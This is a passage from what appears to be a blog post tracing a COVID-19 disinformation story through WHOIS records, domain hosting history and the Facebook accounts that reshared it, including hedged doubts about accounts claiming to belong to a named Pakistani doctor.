it has been almost a year since I wrote for Forbes, and they were on WordPress until a few weeks before I stopped writing for them, although it was branded with Forbes logos.</p><p>Next, notice the writing in Vietnamese. According to Google Translate, this is translated into:</p><blockquote><p>Read Vietnamese</p></blockquote><blockquote><p>Breaking news: The family of three Hanoians died before testing positive for coronavirus</p></blockquote><p>This is not included in the original piece, which indicates that this is being used as a staging ground or template for other similar stories. There is only one author, and all stories are COVID-19 related. Another peculiar thing about this site is that sometimes a full name is in the URL; other times, it is the story ID. This is usually due to a misconfigured CMS like Wordpress.</p><p>Let&#8217;s take a quick look at WHOIS data to see if that tells us anything.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_jUO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_jUO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 424w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 848w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 1272w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_jUO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_jUO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 424w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 848w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 1272w, https://substackcdn.com/image/fetch/$s_!_jUO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d88b0eb-3a77-448f-9e8b-66b2a4495fea_800x884.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">DomainTools WHOIS entry for Sample 2</figcaption></figure></div><p>We see the domain is 41 days old, which is a bit suspect. The WHOIS record indicates that the registrant is using Domain Privacy, but is in the US and that the registrar is Wild West Domains, a subsidiary of GoDaddy, according to their about page.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VPG8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VPG8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 424w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 848w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 1272w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VPG8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!VPG8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 424w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 848w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 1272w, https://substackcdn.com/image/fetch/$s_!VPG8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2390b15a-f020-46ff-9e05-fd57f8b9d7aa_800x46.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Getting a little more information from <a href="https://securitytrails.com/">SecurityTrails</a>, we see the domain history for the domain. The current hosting for the domain was opened on March 5, 2020, which corroborates with what we saw from DomainTools. We also see two other IP Addresses that it occupied. The one without a box around it hosts about four other sites that do not load. The one with an arrow pointing at it hosts a Chinese porn site. While the porn site sets off some alarms, it was only hosted there for eight months in 2013 before popping up on the next one in March 2014 for six years.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZIpW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZIpW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 424w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 848w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 1272w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZIpW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e3995eba-cf2c-4000-b162-7262f1faa352_800x281.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZIpW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 424w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 848w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 1272w, https://substackcdn.com/image/fetch/$s_!ZIpW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3995eba-cf2c-4000-b162-7262f1faa352_800x281.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">SecurityTrails entry for WHOIS history for Sample 2&#8217;s domain</figcaption></figure></div><p>Pivoting to social media to dig further, I journeyed on the ride of my life. Doing a little bit of research using the verbiage of the story is where this flow gets messy. First, I attempted to search for the author by name, which yielded nothing, which is very suspicious as most reputable journalists have social media platforms and their work email addresses shared for people to send leads to.</p><p>Next, I was attempting to fact check the main points by searching in Google and on Facebook. Because aspects of the story came from other sources, this was not very fruitful in determining the validity of the claims. It appears as if every claim is mostly true, but not in the context provided in the story, thus qualifying as <em><strong>disinformation.</strong></em></p><p>Facebook, on the other hand, brought some serious stuff out. I searched for the author&#8217;s name there and found a few accounts, but could not pinpoint whether any of them were the person in question. I did, however, note several accounts with near-identical verbiage pushing the ideas of the story through copying and pasting the story as Facebook statuses. Five were public. The picture below shows them.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!w_V5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!w_V5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 424w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 848w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 1272w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!w_V5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/534537b9-058e-4493-b396-f0894604206f_506x847.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!w_V5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 424w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 848w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 1272w, https://substackcdn.com/image/fetch/$s_!w_V5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F534537b9-058e-4493-b396-f0894604206f_506x847.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Facebook search results for Sample 2&#8217;s Author&#8217;s Name</figcaption></figure></div><p>I decided to see what I could gather from these accounts to see if they were bots or just people who believed the story. One was for ex-pats of one country residing in another. The tone of that post was to try to spread the information, but the people in the comment section were not having it. One of the other accounts lists their phone number in the open. They breed and sell dogs. This same account was consistently sharing conspiracy theory-type stories about COVID-19 and Hydroxychloroquine. A lot of the sources that this user was sharing stories from have been rated as conspiracy theories on <a href="https://mediabiasfactcheck.com/">MediaBiasFactCheck.com</a>.</p><p>I next searched Facebook for the archive.org link. One of these accounts was a little more aggressive than the previous one. They were sharing both the text as a post and the archive.org link to the story. They also shared a Google drive link for a folder with the title of <em><strong>VIRAL</strong></em>, which displayed this (when accessed via a safe system):</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ys2V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ys2V!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 424w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 848w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 1272w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ys2V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ys2V!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 424w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 848w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 1272w, https://substackcdn.com/image/fetch/$s_!ys2V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F680753a3-cf66-45cc-94d1-b7c694d24609_800x406.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Google Drive shared by someone who shared Sample 2</figcaption></figure></div><p>Everything else this user shared was from or about a technology firm that &#8220;can promote the regeneration of the fabric that has been destroyed by the virus, therefore strengthening immunity is not enough in many cases,&#8221; which screams hoax or snake oil.</p><p>The next merely shared the link and had nothing else of immediate interest. The next account appeared to be aggressively sharing COVID-19 related articles but in Tamil. I was unable to translate many of the posts since I was trying to avoid downloading all the memes and pictures and run them through an optical character recognition (OCR) reader and then a translator.</p><p>Here is precisely where it gets more volatile. One of the other accounts posting the link also posted in Tamil but also mentioned Pakistan frequently. This is odd because one of the accounts that also shared the link claims to be Dr. Gholam Mujaba, a prominent figure in Pakistan with some alleged ties to the US. Due to the Wikipedia page being laden with missing links and accolades such as <em><strong>Co-leader of the top Clash of Clans clan as of 3/26/20, </strong></em>it seems all but impossible to identify if this is a real account. It is not verified, and a LinkedIn with the same name has a lot of the same information, but missing logic and citing things out of place.</p><p>Regarding the picture below, the section in the top red box is a common fake copyright notice that makes its way across Facebook from time to time. The terms of service of Facebook negates 100% all of this statement. Under <em>Copy RIGHTS </em>[sic], we see mention of the phrase <em>This FB page, </em>which is rather unprofessional, followed by a Gmail address with Affiliation with the Republican National Convention, USA, despite listing political views as <em>Liberal.</em> I am not trying to split hairs, but the US Republican party tends to refer to themselves as the GOP, rather than the RNC. This seems to be created by someone seeking to cause political turmoil without knowledge of American politics.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZBxB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZBxB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 424w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 848w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 1272w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZBxB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZBxB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 424w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 848w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 1272w, https://substackcdn.com/image/fetch/$s_!ZBxB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18346089-cd39-47c5-b5b0-3ba5048fbe06_666x997.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Dr. Gholam Mujtaba About page on Facebook</figcaption></figure></div><p>Here is the empty link section for Wikipedia. In reviewing the Wikipedia page&#8217;s edits as far back as 2008, his page seems to attract vandals and false editors. Many of the accolades and accomplishments that would&#8217;ve been known at the times of the edits were added much later. For example, mentions of his Masters in Pharmacology and his Ph.D. were added in May 2018 by an IP Address that belongs to RCN, which is an ISP in the area between Washington DC and Philadelphia as well as New York, Boston, and Chicago, per their website. <strong>To be clear, I am not saying that there is not a person by the name of Dr. Gholam Mujtaba with these credentials and accolades. I am saying that I am not 100% convinced that the accounts purporting to belong to him are authentic.</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" 